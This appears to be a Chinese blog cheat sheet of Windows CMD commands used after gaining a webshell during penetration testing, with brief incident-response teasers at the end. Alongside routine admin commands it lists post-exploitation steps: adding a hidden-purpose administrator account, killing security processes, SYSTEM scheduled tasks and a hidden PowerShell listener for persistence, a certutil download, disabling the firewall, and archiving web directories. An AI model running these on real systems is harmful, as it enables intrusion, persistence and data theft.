滲透測試與應急響應常用CMD命令

2021-10-01 08:51:19 字數 3053 閱讀 9496

在web滲透測試過程中,當我們通過某個漏洞利用成功獲取到webshell後,下一步便要通過webshell進行提權或打包資料。由於webshell對遠端伺服器的操控,是通過命令列而非圖形化介面實現的,因此,滲透過程中熟悉常用的命令十分有必要,本文總結了一些滲透測試時常用的cmd命令。

————————————————

ipconfig

ipconfig /all #檢視當前網絡卡

ipconfig /release #釋放網絡卡上的ip位址,網絡卡不禁用

ipconfig /flushdns #重新整理dns解析快取

ipconfig /renew #更新指定網絡卡的ipv4位址,用於客戶端獲取dhcp

ipconfig /displaydns #獲取當前主機的dns快取記錄

net
net user xiaoming 123456 /add	#新增使用者xiaoming,設定密碼為123456

net user xiaoming #檢視使用者xiaoming的資訊

net user xiaoming /del #刪除使用者xiaoming

net user /domain #判斷使用者是否是域成員

net localgroup administrators #檢視administrators組有哪些成員

net localgroup administrators xiaoming /add #將xiaoming新增到administrators組中

net start service_name

net stop service_name

whoami     #檢視當前使用者名稱及許可權
whoami /user #檢視當前使用者sid
netstat
netstat -ano #檢視當前網路連線情況

netstat -anbv #獲取程序名、呼叫元件的路徑

systeminfo     #檢視當前計算機版本、架構、補丁等基本資訊

msinfo32 #獲取詳細系統硬體資訊、環境變數

start /wait msinfo32.exe /report c:\list.txt /categariesswenv+swenvrunningtasks
ver     #檢視當前windows版本

tasklist /svc     #檢視當前程序的主持服務

taskkill /im /f safe.exe     #強行殺掉safe.exe程序

logoff 1     #終止會話id為1的會話

cacls     #顯示或修改檔案的訪問控制列表

dir /ah     #顯示具有隱藏屬性的檔案

del /ah /f autorun.inf     #強制刪除具有隱藏屬性的檔案autorun.inf

attrib -s -r -h autorun.inf     #清除檔案的系統s、唯讀r、隱藏h屬性

mstsc /admin /v: 192.168.0.22:3389     #突破遠端桌面連線2個使用者同時登陸

wmic process > process.txt     #檢視所有程序及路徑,重定向到process文字檔案

sc 命令     #用來服務控制管理器和服務進行通訊

sc create servername binpath=

"c:\test.exe" start=auto displayname=

"test service"

#建立乙個test service的服務

sc start servername #啟動服務

sc delet servername #刪除服務

sc stop servername #關閉服務

ntbackup命令
ntbackup backckup c:\inetpub\wwwroot /j "my job" /f "c:back.bkf"

#使用windows自帶命令打包檔案

rar命令
rar.exe a -ag -k -r -s -m1 d:\webs\1.rar d:\webs  #把d:\webs\目錄下所有內容打包為1.rar放到d:\webs目錄下
type命令 #相當於linux的cat命令,檢視檔案內容。
certutil -urlcache -f "" a.php
schtasks計畫任務命令
schtasks /create /rl highest /f /ru "system"

/tn "windowss"

/tr "c:/test.exe"

/sc daily /mo 1 /st 00:00

計畫任務立即執行某程序

schtasks /run /tn "windowss"
使用powershell隱藏執行某程序

schtasks /create /tn "windowss" /tr "powershell -windowstyle hidden -command 'python c:\test.py -lp 4444'" /sc onlogon
netsh命令控制防火牆

推薦命令

netsh advfirewall set allprofiles state on
棄用命令,會觸發360報警彈窗

c:\windows\system32>netsh firewall set opmode disable

重要資訊: 已成功執行命令。

但是,"netsh firewall" 已棄用;

請改用 "netsh advfirewall firewall" 。

有關使用 "netsh advfirewall firewall" 命令

而非 "netsh firewall" 的詳細資訊,請參閱

上的 kb 文章 947709。

確定。

應急響應常用命令

windows常用命令 net user 檢視使用者 無法列出 使用者 hkey local machine sam sam domains account users 檢視登錄檔中的使用者 net localgroup administrators 檢視本地管理員組 net session 檢視會...

網路犯罪取證調查與應急響應研究

一 取證調查與應急響應的關係 計算機取證調查是應急響應工作展開的必 備基礎。應急響應工作則是計算機取證調查能夠順 利展開的必要前提。二 計算機與網路取證調查的關係 網路本身始終是計算機資訊交流的載體,支撐網路本身的基礎支點仍然只可能是計 算機。網路交換機,防火牆 入侵檢測系統 ids 入侵保護系統 ...

Metasploit與滲透測試簡介

滲透測試是通過識別安全計畫中的系統弱點與不足之處的一種最為有效的技術方式。通過嘗試挫敗安全控制措施並繞開防禦機制,滲透測試師能夠找出攻擊者可能攻陷企業安全計畫 並對企業帶來嚴重破壞後果的方法。滲透測試 penetrationtesting 是一種通過模擬攻擊者的技術與方法,挫敗目標系統的安全控制措施...